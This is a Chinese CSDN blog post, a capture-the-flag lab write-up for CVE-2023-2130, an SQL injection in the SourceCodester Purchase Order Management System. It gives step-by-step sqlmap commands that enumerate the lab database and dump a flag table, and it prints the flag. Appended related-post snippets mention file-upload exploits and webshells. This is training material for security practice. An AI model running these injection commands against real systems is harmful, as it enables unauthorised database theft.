春秋云境-CVE-2023-2130

最新推荐文章于 2024-12-13 15:54:19 发布
最新推荐文章于 2024-12-13 15:54:19 发布
阅读量505 收藏 4
点赞数 12
文章标签: web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dsasdasdd/article/details/137726012
版权
文章报道了在SourceCodester的采购订单管理系统1.0中发现的一个关键漏洞,通过SQL注入攻击,攻击者利用`pythonsqlmap`工具逐步获取数据库信息,最终获取到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目描述:在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

进入页面

进入他提示的组件位置

url输入id=1 看有没有回显

发现有回显,直接sqlmap爆破数据库

python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -dbs

接下来爆破表

python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -tables

然后爆字段

python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -T fllllaaaag -columns

接下来爆数据

python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -T fllllaaaag -C flag -dump

顺利拿到flag

flag{4c8dcb54-05f7-4341-bc9b-669c1453670c}

春秋-Apache Struts2 目录遍历及文件上传漏洞(CVE-2023-50164)
shelbytt的博客
07-31 739
攻击者可以操纵文件上传参数以启用路径遍历,在某些情况下,这可能导致上传恶意文件,从而执行远程代码。建议用户升级到Struts 2.5.33或Struts 6.3.0.2或更高版本以解决这个问题。
CVE-2023-33440~文件上传【春秋靶场渗透】
weixin_67832625的博客
08-04 983
主要是因为靶场资源较少,发一篇避坑教程~~~
[春秋镜] CVE-2023-2130
m0_73649671的博客
04-22 1557
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋靶场之CVE-2023-2130
sjh0590的博客
09-18 499
春秋靶场之CVE-2023-2130攻克过程
CVE-2023-2130复现
qq_45956062的博客
03-28 590
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋-CVE-2023-2130
xxxtentaction24的博客
04-28 272
查看fllllaaaag表代码: python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?使用代码:python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?测试是否存在sql问题我们在?
春秋CVE-2023-2130
qq274575499的博客
04-01 1042
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2023-38836~文件上传漏洞【春秋靶场渗透】
weixin_67832625的博客
07-31 394
春秋模拟真实靶场环,本题运用了文件上传的漏洞,对环进行渗透,详细介绍了解题思路。
SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130
热门推荐
Flag少侠的博客
07-19 1万+
打开靶场直接进入是需要登录的访问漏洞页面如下传送 id 参数试试使用 SQLMap 爆库_____H__[Y/n] n[Y/n] n[y/N] n[Y/n] n[Y/n] n[y/N] n------[*] mysql爆表_____H__------[7 tables]| users |爆字段_____H__------爆数据_____H__------[1 entry]| flag |
CVE-2023-1313复现(春秋镜)
weixin_62248541的博客
10-15 1009
cockpit在2.4.1版本之前存在任意文件上传漏洞。PS:通过在浏览器中打开/install来重新安装。
cockpit 文件上传漏洞(CVE-2023-1313)
zneVue
07-21 507
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
CVE-2023-1313【春秋镜】
weixin_49064458的博客
12-13 795
cockpit在2.4.1版本之前存在任意文件上传漏洞
春秋CVE-2023-1313
2303_76653367的博客
05-10 493
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。5.获取文件地址,右键download在新窗口中打开链接,得到文件存放地址。2.访问install,得到账号密码:admin\admin。发现需要账号密码,按题目要求访问install。3.进入主页,发现上传页面,上传一句话木马。比较简单的一道文件上传题。
春秋 CVE-2022-32991
qq_44640313的博客
05-13 380
Web Based Quiz System SQL注入,CVE-2022-32991漏洞
春秋CVE-2022-4230
qq274575499的博客
05-07 2015
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1857
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋CVE-2023-7105
qq274575499的博客
04-10 547
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2022-32991[漏洞复现]
如有错误感谢斧正
04-17 782
则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数。该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞。可以看到这里的URL地址就出现了welcome.php和eid参数。进入了home目录,这里有三个话题可以选择开启。先在页面正常注册、登录一个账号。拿到了四个数据库,继续选择ctf库进行爆表。随便选择一个进行开启点击Start即可。进入后查看网页URL。
春秋CVE-2023-33440
最新发布
01-12
### 关于春秋 CVE-2023-33440 漏洞详情 对于CVE-2023-33440,在当前提供的参考资料中并未直接提及此特定编号的漏洞细节。然而,基于以往处理类似安全事件的经验以及Apache Struts项目的安全公告模式[^1],可以推测这类CVE通常涉及Web应用程序框架中存在的某种形式的安全缺陷。 针对未具体说明的CVE编号,建议采取以下通用措施来应对潜在风险: #### 一、漏洞影响范围 此类漏洞可能会影响使用了受影响版本组件的应用程序,特别是那些依赖于特定功能实现的部分。例如,在之前的案例中提到的不同类型的Struts2漏洞均涉及到不同场景下的远程代码执行可能性或文件操作不当等问题[^2][^3][^4]。 #### 二、修复方案概述 为了有效缓解并最终解决由CVE-2023-33440引起的风险,应当遵循官方发布的最新指南进行更新或打补丁。一般情况下,这包括但不限于以下几个方面: - **及时升级软件**:确保所使用的Apache Struts库是最新的稳定版。 - **审查现有配置**:检查应用服务器上的所有设置是否符合最佳实践标准,尤其是与安全性有关的部分。 - **强化输入验证机制**:加强对用户提交数据的有效性和合法性校验,防止恶意构造的数据触发漏洞。 - **监控异常行为**:部署日志审计工具和服务端防护产品,以便快速发现任何可疑活动。 由于缺乏具体的漏洞描述和技术分析文档作为依据,上述内容仅能作为一个大致方向指导。强烈推荐查阅来自权威渠道的第一手资料获取最准确的信息。 ```bash # 假设存在一个命令用于查询最新的安全通告 curl https://struts.apache.org/security.html | grep "CVE-2023-33440" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值